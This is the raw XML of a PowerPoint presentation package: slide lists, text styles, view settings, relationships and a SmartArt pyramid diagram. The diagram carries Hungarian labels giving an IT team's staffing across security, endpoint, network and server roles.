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tiff" ContentType="image/tiff"/>
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+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heme/theme3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3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4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5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6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7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8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9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0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11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3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4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3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId19"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId20"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="273" r:id="rId4"/>
    <p:sldId id="310" r:id="rId5"/>
    <p:sldId id="358" r:id="rId6"/>
    <p:sldId id="362" r:id="rId7"/>
    <p:sldId id="361" r:id="rId8"/>
    <p:sldId id="360" r:id="rId9"/>
    <p:sldId id="365" r:id="rId10"/>
    <p:sldId id="364" r:id="rId11"/>
    <p:sldId id="363" r:id="rId12"/>
    <p:sldId id="366" r:id="rId13"/>
    <p:sldId id="367" r:id="rId14"/>
    <p:sldId id="368" r:id="rId15"/>
    <p:sldId id="369" r:id="rId16"/>
    <p:sldId id="370" r:id="rId17"/>
    <p:sldId id="341" r:id="rId18"/>
  </p:sldIdLst>
  <p:sldSz cx="11522075" cy="6480175"/>
  <p:notesSz cx="7099300" cy="10234613"/>
  <p:custDataLst>
    <p:tags r:id="rId21"/>
  </p:custDataLst>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="de-DE"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" fontAlgn="base">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="25000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2300" kern="1200">
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:latin typeface="Tele-GroteskFet" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" defTabSz="457200" rtl="0" fontAlgn="base">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="25000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2300" kern="1200">
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:latin typeface="Tele-GroteskFet" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" defTabSz="457200" rtl="0" fontAlgn="base">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="25000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2300" kern="1200">
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:latin typeface="Tele-GroteskFet" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" defTabSz="457200" rtl="0" fontAlgn="base">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="25000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2300" kern="1200">
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:latin typeface="Tele-GroteskFet" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" defTabSz="457200" rtl="0" fontAlgn="base">
      <a:lnSpc>
        <a:spcPct val="90000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPct val="25000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="2300" kern="1200">
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:latin typeface="Tele-GroteskFet" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2300" kern="1200">
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:latin typeface="Tele-GroteskFet" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2300" kern="1200">
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:latin typeface="Tele-GroteskFet" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2300" kern="1200">
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:latin typeface="Tele-GroteskFet" pitchFamily="2" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="Arial" charset="0"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="2300" kern="1200">
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:latin typeface="Tele-GroteskFet" pitchFamily="2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05">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="798">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="1055">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="3723">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="3267">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="2265">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" orient="horz" pos="3495">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" orient="horz" pos="3878">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="3684">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="208">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" pos="7051">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" pos="357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CB44"/>
    <a:srgbClr val="FF9A1E"/>
    <a:srgbClr val="FFDE5F"/>
    <a:srgbClr val="65C8C0"/>
    <a:srgbClr val="7ECBF5"/>
    <a:srgbClr val="32BCAD"/>
    <a:srgbClr val="4B4B4B"/>
    <a:srgbClr val="CFD89B"/>
    <a:srgbClr val="1063AD"/>
    <a:srgbClr val="FFD32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5AB1C69-6EDB-4FF4-983F-18BD219EF32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7805" autoAdjust="0"/>
    <p:restoredTop sz="86012" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102" d="100"/>
        </p:scale>
        <p:origin x="368" y="152"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="205"/>
        <p:guide orient="horz" pos="798"/>
        <p:guide orient="horz" pos="1055"/>
        <p:guide orient="horz" pos="3723"/>
        <p:guide orient="horz" pos="3267"/>
        <p:guide orient="horz" pos="2265"/>
        <p:guide orient="horz" pos="3495"/>
        <p:guide orient="horz" pos="3878"/>
        <p:guide pos="3684"/>
        <p:guide pos="208"/>
        <p:guide pos="7051"/>
        <p:guide pos="357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74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="-3420" y="-96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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/handoutMaster" Target="handoutMasters/handoutMaster1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles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slide" Target="slides/slide14.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId1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slideMaster" Target="slideMasters/slideMaster1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64586C4-DD83-2B42-ACB9-4F6020FBCF56}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC95C093-69AC-964A-838F-7A28250ADEB1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t>2 VÉGPONTI ÜZEMELTETŐ (TECHNIKUS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14F0A688-E07A-B143-9998-55B304F332AE}" type="parTrans" cxnId="{1C677A1A-AFB7-9D44-BA0C-D2B0FDA927F8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C535E8F1-740D-0245-B3CE-DED747BD952F}" type="sibTrans" cxnId="{1C677A1A-AFB7-9D44-BA0C-D2B0FDA927F8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30B6CEBC-3F70-D84A-8091-C03D8AD8882C}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>2 HÁLÓZATOS KOLLÉGA (ROUTER, VLAN, VPN)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F175839-FD64-C841-AA3A-65BF98C4EC42}" type="parTrans" cxnId="{09E7F320-FA2F-AB4D-A030-DC1771DE7295}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{75232074-1C61-8949-A06E-D321CB7B26AF}" type="sibTrans" cxnId="{09E7F320-FA2F-AB4D-A030-DC1771DE7295}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA1F7537-F5A5-AA41-9BA3-01374433C1D1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>3 SZERVERES KOLLÉGA</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            <a:t>(DC, LEVELEZÉS, ADATBÁZIS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3706167F-FE77-FA48-B604-DC581162D17F}" type="parTrans" cxnId="{C2CC30D2-3DB5-5340-ACE2-982C6A36DD80}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F0F217E-791D-5748-95DE-20E069B2E542}" type="sibTrans" cxnId="{C2CC30D2-3DB5-5340-ACE2-982C6A36DD80}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08BDD196-91E1-2B4D-92C4-28C4C53382D5}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t>2</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            <a:t>SEC-ES</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8724D54-422A-1B42-ABA0-534B8C43DC2D}" type="parTrans" cxnId="{8B4A987F-9AAC-7949-8A69-2ACD8D992363}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9811B685-1BA7-B349-B79E-C9C0F62C8F3F}" type="sibTrans" cxnId="{8B4A987F-9AAC-7949-8A69-2ACD8D992363}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1600"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E04015C1-CC90-BA43-BCBE-C2B292DDB3B2}" type="pres">
      <dgm:prSet presAssocID="{D64586C4-DD83-2B42-ACB9-4F6020FBCF56}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D9B0331A-5E8A-CE4A-A409-1BC2EC3CBF6F}" type="pres">
      <dgm:prSet presAssocID="{08BDD196-91E1-2B4D-92C4-28C4C53382D5}" presName="Name8" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AD5F244D-62B6-C843-AABD-B47A35F2AE17}" type="pres">
      <dgm:prSet presAssocID="{08BDD196-91E1-2B4D-92C4-28C4C53382D5}" presName="level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E52A6AF-29B5-5C4C-818B-46FF039856F4}" type="pres">
      <dgm:prSet presAssocID="{08BDD196-91E1-2B4D-92C4-28C4C53382D5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C5FDD61-D290-F74C-BD1F-28C927A0A798}" type="pres">
      <dgm:prSet presAssocID="{EC95C093-69AC-964A-838F-7A28250ADEB1}" presName="Name8" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8E1B66BD-D063-5643-AEDE-8F4062D7890E}" type="pres">
      <dgm:prSet presAssocID="{EC95C093-69AC-964A-838F-7A28250ADEB1}" presName="level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4DD188B-9B16-CD4B-9167-D2BA18F61AD1}" type="pres">
      <dgm:prSet presAssocID="{EC95C093-69AC-964A-838F-7A28250ADEB1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D594C26-B249-234A-8E13-0D8DE9BC83FE}" type="pres">
      <dgm:prSet presAssocID="{30B6CEBC-3F70-D84A-8091-C03D8AD8882C}" presName="Name8" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{94049C73-DECE-AD41-A055-599FFCE94955}" type="pres">
      <dgm:prSet presAssocID="{30B6CEBC-3F70-D84A-8091-C03D8AD8882C}" presName="level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35BC3C5-0D10-CD4C-B022-FED3E899DA19}" type="pres">
      <dgm:prSet presAssocID="{30B6CEBC-3F70-D84A-8091-C03D8AD8882C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FC56736-F756-3240-A3CC-E5E8BFB3AF81}" type="pres">
      <dgm:prSet presAssocID="{DA1F7537-F5A5-AA41-9BA3-01374433C1D1}" presName="Name8" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D5A997C0-F415-C540-B26C-8101BED81136}" type="pres">
      <dgm:prSet presAssocID="{DA1F7537-F5A5-AA41-9BA3-01374433C1D1}" presName="level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C11AEC1-DFD6-6943-BBE9-C15EAC7FEEC6}" type="pres">
      <dgm:prSet presAssocID="{DA1F7537-F5A5-AA41-9BA3-01374433C1D1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C677A1A-AFB7-9D44-BA0C-D2B0FDA927F8}" srcId="{D64586C4-DD83-2B42-ACB9-4F6020FBCF56}" destId="{EC95C093-69AC-964A-838F-7A28250ADEB1}" srcOrd="1" destOrd="0" parTransId="{14F0A688-E07A-B143-9998-55B304F332AE}" sibTransId="{C535E8F1-740D-0245-B3CE-DED747BD952F}"/>
    <dgm:cxn modelId="{1E377379-D3AD-7A47-ABBF-A1006E500592}" type="presOf" srcId="{D64586C4-DD83-2B42-ACB9-4F6020FBCF56}" destId="{E04015C1-CC90-BA43-BCBE-C2B292DDB3B2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{C2CC30D2-3DB5-5340-ACE2-982C6A36DD80}" srcId="{D64586C4-DD83-2B42-ACB9-4F6020FBCF56}" destId="{DA1F7537-F5A5-AA41-9BA3-01374433C1D1}" srcOrd="3" destOrd="0" parTransId="{3706167F-FE77-FA48-B604-DC581162D17F}" sibTransId="{9F0F217E-791D-5748-95DE-20E069B2E542}"/>
    <dgm:cxn modelId="{8DC83FC3-C4CB-B644-A70A-670F86CA7940}" type="presOf" srcId="{30B6CEBC-3F70-D84A-8091-C03D8AD8882C}" destId="{A35BC3C5-0D10-CD4C-B022-FED3E899DA19}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{97D6BF53-C68A-694E-86CD-DF7B8CA8A624}" type="presOf" srcId="{08BDD196-91E1-2B4D-92C4-28C4C53382D5}" destId="{5E52A6AF-29B5-5C4C-818B-46FF039856F4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{B20B6F93-1BB5-A645-92CF-0133D8A128EB}" type="presOf" srcId="{EC95C093-69AC-964A-838F-7A28250ADEB1}" destId="{04DD188B-9B16-CD4B-9167-D2BA18F61AD1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{F51E4A3A-C738-8241-8328-CD2CC38F3615}" type="presOf" srcId="{DA1F7537-F5A5-AA41-9BA3-01374433C1D1}" destId="{7C11AEC1-DFD6-6943-BBE9-C15EAC7FEEC6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{09E7F320-FA2F-AB4D-A030-DC1771DE7295}" srcId="{D64586C4-DD83-2B42-ACB9-4F6020FBCF56}" destId="{30B6CEBC-3F70-D84A-8091-C03D8AD8882C}" srcOrd="2" destOrd="0" parTransId="{2F175839-FD64-C841-AA3A-65BF98C4EC42}" sibTransId="{75232074-1C61-8949-A06E-D321CB7B26AF}"/>
    <dgm:cxn modelId="{87F82667-EFEA-A04A-8B3B-EB4769776DCB}" type="presOf" srcId="{EC95C093-69AC-964A-838F-7A28250ADEB1}" destId="{8E1B66BD-D063-5643-AEDE-8F4062D7890E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{8B4A987F-9AAC-7949-8A69-2ACD8D992363}" srcId="{D64586C4-DD83-2B42-ACB9-4F6020FBCF56}" destId="{08BDD196-91E1-2B4D-92C4-28C4C53382D5}" srcOrd="0" destOrd="0" parTransId="{C8724D54-422A-1B42-ABA0-534B8C43DC2D}" sibTransId="{9811B685-1BA7-B349-B79E-C9C0F62C8F3F}"/>
    <dgm:cxn modelId="{CC4239C4-572A-D144-B629-FFDBBE8E0AA2}" type="presOf" srcId="{DA1F7537-F5A5-AA41-9BA3-01374433C1D1}" destId="{D5A997C0-F415-C540-B26C-8101BED81136}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{0204F6D9-3901-AF49-903F-916E173AD75E}" type="presOf" srcId="{30B6CEBC-3F70-D84A-8091-C03D8AD8882C}" destId="{94049C73-DECE-AD41-A055-599FFCE94955}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{FBD4B6E3-BFEB-C64D-A00F-B197445353C7}" type="presOf" srcId="{08BDD196-91E1-2B4D-92C4-28C4C53382D5}" destId="{AD5F244D-62B6-C843-AABD-B47A35F2AE17}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{AEB022BE-39B6-4648-950D-DB85B6372452}" type="presParOf" srcId="{E04015C1-CC90-BA43-BCBE-C2B292DDB3B2}" destId="{D9B0331A-5E8A-CE4A-A409-1BC2EC3CBF6F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{7AC0B174-0C0B-A647-A6CD-AAFEECB0DED9}" type="presParOf" srcId="{D9B0331A-5E8A-CE4A-A409-1BC2EC3CBF6F}" destId="{AD5F244D-62B6-C843-AABD-B47A35F2AE17}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{C16C9C36-70F9-BC4F-8575-2C88534FD669}" type="presParOf" srcId="{D9B0331A-5E8A-CE4A-A409-1BC2EC3CBF6F}" destId="{5E52A6AF-29B5-5C4C-818B-46FF039856F4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{598B61D9-3E15-8841-AFDA-448D6F2C70CA}" type="presParOf" srcId="{E04015C1-CC90-BA43-BCBE-C2B292DDB3B2}" destId="{2C5FDD61-D290-F74C-BD1F-28C927A0A798}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{3A2AFE34-20D6-2740-9A8E-A6600672EE58}" type="presParOf" srcId="{2C5FDD61-D290-F74C-BD1F-28C927A0A798}" destId="{8E1B66BD-D063-5643-AEDE-8F4062D7890E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{86253121-90BB-1B46-BF8F-756907619CF7}" type="presParOf" srcId="{2C5FDD61-D290-F74C-BD1F-28C927A0A798}" destId="{04DD188B-9B16-CD4B-9167-D2BA18F61AD1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{B8311FC3-C898-5247-A85B-85B253C4947A}" type="presParOf" srcId="{E04015C1-CC90-BA43-BCBE-C2B292DDB3B2}" destId="{FD594C26-B249-234A-8E13-0D8DE9BC83FE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{34F751A8-7FCF-4143-A0E2-3B3A65E975D1}" type="presParOf" srcId="{FD594C26-B249-234A-8E13-0D8DE9BC83FE}" destId="{94049C73-DECE-AD41-A055-599FFCE94955}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{7E60A402-C104-C14D-B87F-1FCF9F05707A}" type="presParOf" srcId="{FD594C26-B249-234A-8E13-0D8DE9BC83FE}" destId="{A35BC3C5-0D10-CD4C-B022-FED3E899DA19}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{9574DE4D-DB24-F240-A5D6-39C0A7388289}" type="presParOf" srcId="{E04015C1-CC90-BA43-BCBE-C2B292DDB3B2}" destId="{4FC56736-F756-3240-A3CC-E5E8BFB3AF81}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{1D85B441-EA2C-7044-8117-A11C3055651D}" type="presParOf" srcId="{4FC56736-F756-3240-A3CC-E5E8BFB3AF81}" destId="{D5A997C0-F415-C540-B26C-8101BED81136}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pyramid1"/>
    <dgm:cxn modelId="{4E7469C9-3B2C-2E43-859E-EA3C0D236000}" type="presParOf" srcId="{4FC56736-F756-3240-A3CC-E5E8BFB3AF81}" destId="{7C11AEC1-DFD6-6943-BBE9-C15EAC7FEEC6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D5F244D-62B6-C843-AABD-B47A35F2AE17}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1960659" y="0"/>
          <a:ext cx="1307106" cy="980161"/>
        </a:xfrm>
        <a:prstGeom prst="trapezoid">
          <a:avLst>
            <a:gd name="adj" fmla="val 66678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2</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean="0"/>
            <a:t>SEC-ES</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1960659" y="0"/>
        <a:ext cx="1307106" cy="980161"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8E1B66BD-D063-5643-AEDE-8F4062D7890E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1307106" y="980161"/>
          <a:ext cx="2614212" cy="980161"/>
        </a:xfrm>
        <a:prstGeom prst="trapezoid">
          <a:avLst>
            <a:gd name="adj" fmla="val 66678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2 VÉGPONTI ÜZEMELTETŐ (TECHNIKUS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1764593" y="980161"/>
        <a:ext cx="1699238" cy="980161"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{94049C73-DECE-AD41-A055-599FFCE94955}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="653553" y="1960323"/>
          <a:ext cx="3921318" cy="980161"/>
        </a:xfrm>
        <a:prstGeom prst="trapezoid">
          <a:avLst>
